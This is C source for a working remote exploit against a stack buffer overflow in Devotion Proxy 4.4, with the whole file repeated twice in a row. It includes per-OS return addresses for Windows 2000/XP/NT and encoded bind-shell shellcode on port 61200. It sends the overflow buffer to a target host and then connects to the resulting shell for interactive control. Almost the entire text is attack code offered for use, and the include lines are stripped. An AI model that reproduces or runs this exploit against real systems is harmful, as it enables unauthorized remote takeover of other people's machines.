/* _ ___ _ _ _ _ __| |_ _ / __| | | _ _ (_)_ _| |__ __ _ ___ / _` | '_| (_ |_ _| ' \ | | || | '_ \/ _` (_-< \__,_|_| \___| |_||_||_|/ |\_,_|_.__/\__,_/__/ |__/ Presents.... Devotion Proxy 4.4 Stack Overflow Exploit Vulnerability discovered by drG4njubas[m00] Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet) Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ... Compile with m$ visual c++: cl m00-devproxy.cpp */ #include #include #include #include #pragma comment (lib,"wsock32") struct{ char *platform; DWORD retaddr; //jmp esp } targets[]={ {"Windows 2000 SP1" , 0x77e3cb4c } , {"Windows 2000 SP2" , 0x77e2492b } , {"Windows 2000 SP3" , 0x77e2afc5 } , {"Windows 2000 SP4" , 0x77e14c29 } , {"Windows XP SP0" , 0x77f5801c }, {"Windows XP SP1" , 0x77e626ba }, {"Windows NT SP6" , 0x77f32935 }, NULL }; //Shellcode binds shell to a port 61200 //Download sources from www.m00.ru char shellcode[]= "\xEB\x0F\x58\x80\x30\x92\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" "\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7B\xC6\x93\x92\x92\xCF\xC7\xA3" "\x49\xF6\x19\x91\xD2\x01\x19\xD1\x6D\xD2\xE7\x6B\x19\xC1\x91" "\xF4\xA3\x40\xF4\x2A\x92\x82\xF4\x13\xA8\xDF\xC8\xE6\x95\xBB" "\x50\x7B\x60\x6D\x6D\x6D\x1B\x41\x19\xE8\xAE\x93\x45\x91\xCD" "\xEA\x19\xD9\x8A\x19\xE1\xB2\x19\xE9\xB6\x93\x44\x93\x45\x6E" "\x3F\x93\x42\x04\x15\x6F\xC3\xA3\x5B\x12\x53\x9D\x61\x34\xE0" "\x98\x04\xCB\x15\x6F\xE6\x80\xD5\xD5\x70\x74\x2C\x9D\x92\x92" "\x92\xBB\x5C\xBB\x65\x7B\x7A\x6D\x6D\x6D\xA3\x52\xF4\x19\x95" "\x53\x72\x90\x19\xE1\x8E\x93\x44\x93\x54\x3F\x93\x42\x1B\x54" "\x1B\x45\xCF\xC5\x1F\x0F\x9D\x92\x92\x92\xC1\xC5\x6D\x44\x1F" "\x0F\xC1\x92\x92\x92\xC1\x6D\x42\x1B\x55\x1F\x0F\xC8\x92\x92" "\x92\xC1\xC2\x6D\x44\xA3\x5B\xC3\xC3\xC3\xC3\xFA\x93\x92\x92" "\x92\xFA\x90\x92\x92\x92\x6D\x42\x1B\x51\x1F\x17\xF7\x92\x92" "\x92\xC2\xC5\x6D\x44\xFA\x82\x92\x92\x92\x1F\x1F\xEA\x92\x92" "\x92\xC3\xC1\x6D\x42\x1F\x17\xF8\x92\x92\x92\xC2\xC5\x6D\x44" "\xFA\x93\x92\x92\x92\xC1\x6D\x42\x1F\x17\xE3\x92\x92\x92\xC2" "\xC5\x6D\x44\xA3\x5B\xC3\xC3\xC1\x6D\x42\xCD\xC2\x1F\x0F\xD5" "\x92\x92\x92\xC1\xC5\x6D\x44\xFA\x6D\x92\x92\x92\xFA\xD2\x92" "\x92\x92\x6D\x42\x1B\x51\x1F\x1F\xBA\x92\x92\x92\xC3\xC5\x6D" "\x44\xC1\x6D\x42\xCA\x1B\xD1\xD2\x1B\xD1\xAE\x1B\xD1\xAA\x55" "\xD1\xBE\x93\x93\x92\x92\x1F\x17\xAA\x92\x92\x92\xC2\xC5\x6D" "\x44\xC1\xC1\xA3\x5B\xC3\xC3\xC3\xFA\x93\x92\x92\x92\xC3\xC3" "\x1F\x0F\x1E\x92\x92\x92\xC1\xC3\x6D\x42\x1F\x17\x8E\x92\x92" "\x92\xC2\xC5\x6D\x44\x6D\x42\x7A\x35\x6C\x6D\x6D\xD5\xF7\xE6" "\xC2\xE0\xFD\xF1\xD3\xF6\xF6\xE0\xF7\xE1\xE1\x92\xDE\xFD\xF3" "\xF6\xDE\xFB\xF0\xE0\xF3\xE0\xEB\xD3\x92\xD7\xEA\xFB\xE6\xC2" "\xE0\xFD\xF1\xF7\xE1\xE1\x92\xD5\xF7\xE6\xC1\xE6\xF3\xE0\xE6" "\xE7\xE2\xDB\xFC\xF4\xFD\xD3\x92\xD1\xE0\xF7\xF3\xE6\xF7\xC2" "\xE0\xFD\xF1\xF7\xE1\xE1\xD3\x92\xD5\xFE\xFD\xF0\xF3\xFE\xD3" "\xFE\xFE\xFD\xF1\x92\xE5\xE1\xA0\xCD\xA1\xA0\x92\xC5\xC1\xD3" "\xC1\xFD\xF1\xF9\xF7\xE6\xD3\x92\xF0\xFB\xFC\xF6\x92\xFE\xFB" "\xE1\xE6\xF7\xFC\x92\xF3\xF1\xF1\xF7\xE2\xE6\x92\x90\x92\x7D" "\x82\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x93\x92" "\x92\x92\xF1\xFF\xF6\x92\x6D\x30\x30\x21"; char jump[]= "\x29\x4c\xe1\x77" //retaddr "\x90\x90\x90\x90" "\x90\x90\x90\x90\x90" "\xE9\xFC\xF3\xFF\xFF"; char request[]= " /Proxy.dtl?URL=www.m00.ru HTTP/1.1\r\n" "Accept: */*\r\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n" "Connection: Keep-Alive\r\n" "Cookie: session-id=1\r\n\r\n"; void usage(); void have_fun(int sock); DWORD WINAPI recv_thread(LPVOID lpParam); void main(int argc, char **argv){ WSADATA wsaData; SOCKADDR_IN rmaddr; HOSTENT *addr; SOCKET sock,shell; DWORD tmp; char buf[100], exploit[4096+sizeof(jump)]; int i,t; printf("\n*******************************************\n"); printf(" Devotion Proxy buffer overflow exploit \n"); printf(" Coded by drG4jubas[m00 Crew] \n"); printf("*******************************************\n\n"); if(argc<4){ usage(); return; } t = atoi(argv[3]); i = 0; while(targets[i].platform)i++; if(t >= i){ printf("Bad target\n"); return; } memcpy(jump, &targets[t].retaddr, 4); for(i = 0; i < sizeof(exploit);i++)exploit[i] = '\x90'; for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode[i]; memcpy(exploit+4096, jump, sizeof(jump)-1); WSAStartup(MAKEWORD(2,2), &wsaData); sock = socket(AF_INET, SOCK_STREAM, 0); addr = gethostbyname(argv[1]); if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); else{ printf("Can not resolve host name\n"); return; } rmaddr.sin_family = AF_INET; rmaddr.sin_port = htons(atoi(argv[2])); printf("Connecting to %s...", argv[1]); if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("failed\n"); return; } printf("ok\n"); printf("Sending exploit..."); send(sock, exploit, sizeof(exploit), 0); send(sock, request, sizeof(request), 0); printf("done\n"); CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp); Sleep(100); shell = socket(AF_INET, SOCK_STREAM, 0); rmaddr.sin_port = htons(61200); if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("Exploitation failed:(\n"); closesocket(sock); WSACleanup(); return; } printf("Congratulations!!! Shell spawned :D\n\n"); have_fun(shell); closesocket(shell); closesocket(sock); WSACleanup(); return; } void usage(){ int i; printf("USAGE: "); printf("m00-devproxy.exe \n\n"); printf("Target platforms:\n"); for(i =0; targets[i].platform; i++) printf("%d - %s\n", i, targets[i].platform); } DWORD WINAPI recv_thread(LPVOID lpParam){ SOCKET sock; char buf[128]; sock = (SOCKET)lpParam; recv(sock, buf, 128, 0); return 0; } void have_fun(int sock){ char buf[1024]; int i; fd_set fdread; TIMEVAL time; time.tv_sec = 1; time.tv_usec = 0; do{ FD_ZERO(&fdread); FD_SET(sock, &fdread); i = select(0, &fdread, NULL, NULL, &time); if(i > 0){ int j = recv(sock, buf, 1024, 0); if(j == SOCKET_ERROR)break; buf[j] = '\0'; printf("%s", buf); } if(kbhit()){ fgets(buf, 1024, stdin); send(sock, buf, strlen(buf), 0); if(buf[0] == '\r'){ buf[0] = '\n'; printf("%c",buf[0]); send(sock, buf, 1, 0); } } }while(i != SOCKET_ERROR); return; }/* _ ___ _ _ _ _ __| |_ _ / __| | | _ _ (_)_ _| |__ __ _ ___ / _` | '_| (_ |_ _| ' \ | | || | '_ \/ _` (_-< \__,_|_| \___| |_||_||_|/ |\_,_|_.__/\__,_/__/ |__/ Presents.... Devotion Proxy 4.4 Stack Overflow Exploit Vulnerability discovered by drG4njubas[m00] Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet) Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ... Compile with m$ visual c++: cl m00-devproxy.cpp */ #include #include #include #include #pragma comment (lib,"wsock32") struct{ char *platform; DWORD retaddr; //jmp esp } targets[]={ {"Windows 2000 SP1" , 0x77e3cb4c } , {"Windows 2000 SP2" , 0x77e2492b } , {"Windows 2000 SP3" , 0x77e2afc5 } , {"Windows 2000 SP4" , 0x77e14c29 } , {"Windows XP SP0" , 0x77f5801c }, {"Windows XP SP1" , 0x77e626ba }, {"Windows NT SP6" , 0x77f32935 }, NULL }; //Shellcode binds shell to a port 61200 //Download sources from www.m00.ru char shellcode[]= "\xEB\x0F\x58\x80\x30\x92\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" "\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7B\xC6\x93\x92\x92\xCF\xC7\xA3" "\x49\xF6\x19\x91\xD2\x01\x19\xD1\x6D\xD2\xE7\x6B\x19\xC1\x91" "\xF4\xA3\x40\xF4\x2A\x92\x82\xF4\x13\xA8\xDF\xC8\xE6\x95\xBB" "\x50\x7B\x60\x6D\x6D\x6D\x1B\x41\x19\xE8\xAE\x93\x45\x91\xCD" "\xEA\x19\xD9\x8A\x19\xE1\xB2\x19\xE9\xB6\x93\x44\x93\x45\x6E" "\x3F\x93\x42\x04\x15\x6F\xC3\xA3\x5B\x12\x53\x9D\x61\x34\xE0" "\x98\x04\xCB\x15\x6F\xE6\x80\xD5\xD5\x70\x74\x2C\x9D\x92\x92" "\x92\xBB\x5C\xBB\x65\x7B\x7A\x6D\x6D\x6D\xA3\x52\xF4\x19\x95" "\x53\x72\x90\x19\xE1\x8E\x93\x44\x93\x54\x3F\x93\x42\x1B\x54" "\x1B\x45\xCF\xC5\x1F\x0F\x9D\x92\x92\x92\xC1\xC5\x6D\x44\x1F" "\x0F\xC1\x92\x92\x92\xC1\x6D\x42\x1B\x55\x1F\x0F\xC8\x92\x92" "\x92\xC1\xC2\x6D\x44\xA3\x5B\xC3\xC3\xC3\xC3\xFA\x93\x92\x92" "\x92\xFA\x90\x92\x92\x92\x6D\x42\x1B\x51\x1F\x17\xF7\x92\x92" "\x92\xC2\xC5\x6D\x44\xFA\x82\x92\x92\x92\x1F\x1F\xEA\x92\x92" "\x92\xC3\xC1\x6D\x42\x1F\x17\xF8\x92\x92\x92\xC2\xC5\x6D\x44" "\xFA\x93\x92\x92\x92\xC1\x6D\x42\x1F\x17\xE3\x92\x92\x92\xC2" "\xC5\x6D\x44\xA3\x5B\xC3\xC3\xC1\x6D\x42\xCD\xC2\x1F\x0F\xD5" "\x92\x92\x92\xC1\xC5\x6D\x44\xFA\x6D\x92\x92\x92\xFA\xD2\x92" "\x92\x92\x6D\x42\x1B\x51\x1F\x1F\xBA\x92\x92\x92\xC3\xC5\x6D" "\x44\xC1\x6D\x42\xCA\x1B\xD1\xD2\x1B\xD1\xAE\x1B\xD1\xAA\x55" "\xD1\xBE\x93\x93\x92\x92\x1F\x17\xAA\x92\x92\x92\xC2\xC5\x6D" "\x44\xC1\xC1\xA3\x5B\xC3\xC3\xC3\xFA\x93\x92\x92\x92\xC3\xC3" "\x1F\x0F\x1E\x92\x92\x92\xC1\xC3\x6D\x42\x1F\x17\x8E\x92\x92" "\x92\xC2\xC5\x6D\x44\x6D\x42\x7A\x35\x6C\x6D\x6D\xD5\xF7\xE6" "\xC2\xE0\xFD\xF1\xD3\xF6\xF6\xE0\xF7\xE1\xE1\x92\xDE\xFD\xF3" "\xF6\xDE\xFB\xF0\xE0\xF3\xE0\xEB\xD3\x92\xD7\xEA\xFB\xE6\xC2" "\xE0\xFD\xF1\xF7\xE1\xE1\x92\xD5\xF7\xE6\xC1\xE6\xF3\xE0\xE6" "\xE7\xE2\xDB\xFC\xF4\xFD\xD3\x92\xD1\xE0\xF7\xF3\xE6\xF7\xC2" "\xE0\xFD\xF1\xF7\xE1\xE1\xD3\x92\xD5\xFE\xFD\xF0\xF3\xFE\xD3" "\xFE\xFE\xFD\xF1\x92\xE5\xE1\xA0\xCD\xA1\xA0\x92\xC5\xC1\xD3" "\xC1\xFD\xF1\xF9\xF7\xE6\xD3\x92\xF0\xFB\xFC\xF6\x92\xFE\xFB" "\xE1\xE6\xF7\xFC\x92\xF3\xF1\xF1\xF7\xE2\xE6\x92\x90\x92\x7D" "\x82\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x93\x92" "\x92\x92\xF1\xFF\xF6\x92\x6D\x30\x30\x21"; char jump[]= "\x29\x4c\xe1\x77" //retaddr "\x90\x90\x90\x90" "\x90\x90\x90\x90\x90" "\xE9\xFC\xF3\xFF\xFF"; char request[]= " /Proxy.dtl?URL=www.m00.ru HTTP/1.1\r\n" "Accept: */*\r\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n" "Connection: Keep-Alive\r\n" "Cookie: session-id=1\r\n\r\n"; void usage(); void have_fun(int sock); DWORD WINAPI recv_thread(LPVOID lpParam); void main(int argc, char **argv){ WSADATA wsaData; SOCKADDR_IN rmaddr; HOSTENT *addr; SOCKET sock,shell; DWORD tmp; char buf[100], exploit[4096+sizeof(jump)]; int i,t; printf("\n*******************************************\n"); printf(" Devotion Proxy buffer overflow exploit \n"); printf(" Coded by drG4jubas[m00 Crew] \n"); printf("*******************************************\n\n"); if(argc<4){ usage(); return; } t = atoi(argv[3]); i = 0; while(targets[i].platform)i++; if(t >= i){ printf("Bad target\n"); return; } memcpy(jump, &targets[t].retaddr, 4); for(i = 0; i < sizeof(exploit);i++)exploit[i] = '\x90'; for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode[i]; memcpy(exploit+4096, jump, sizeof(jump)-1); WSAStartup(MAKEWORD(2,2), &wsaData); sock = socket(AF_INET, SOCK_STREAM, 0); addr = gethostbyname(argv[1]); if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); else{ printf("Can not resolve host name\n"); return; } rmaddr.sin_family = AF_INET; rmaddr.sin_port = htons(atoi(argv[2])); printf("Connecting to %s...", argv[1]); if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("failed\n"); return; } printf("ok\n"); printf("Sending exploit..."); send(sock, exploit, sizeof(exploit), 0); send(sock, request, sizeof(request), 0); printf("done\n"); CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp); Sleep(100); shell = socket(AF_INET, SOCK_STREAM, 0); rmaddr.sin_port = htons(61200); if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("Exploitation failed:(\n"); closesocket(sock); WSACleanup(); return; } printf("Congratulations!!! Shell spawned :D\n\n"); have_fun(shell); closesocket(shell); closesocket(sock); WSACleanup(); return; } void usage(){ int i; printf("USAGE: "); printf("m00-devproxy.exe \n\n"); printf("Target platforms:\n"); for(i =0; targets[i].platform; i++) printf("%d - %s\n", i, targets[i].platform); } DWORD WINAPI recv_thread(LPVOID lpParam){ SOCKET sock; char buf[128]; sock = (SOCKET)lpParam; recv(sock, buf, 128, 0); return 0; } void have_fun(int sock){ char buf[1024]; int i; fd_set fdread; TIMEVAL time; time.tv_sec = 1; time.tv_usec = 0; do{ FD_ZERO(&fdread); FD_SET(sock, &fdread); i = select(0, &fdread, NULL, NULL, &time); if(i > 0){ int j = recv(sock, buf, 1024, 0); if(j == SOCKET_ERROR)break; buf[j] = '\0'; printf("%s", buf); } if(kbhit()){ fgets(buf, 1024, stdin); send(sock, buf, strlen(buf), 0); if(buf[0] == '\r'){ buf[0] = '\n'; printf("%c",buf[0]); send(sock, buf, 1, 0); } } }while(i != SOCKET_ERROR); return; }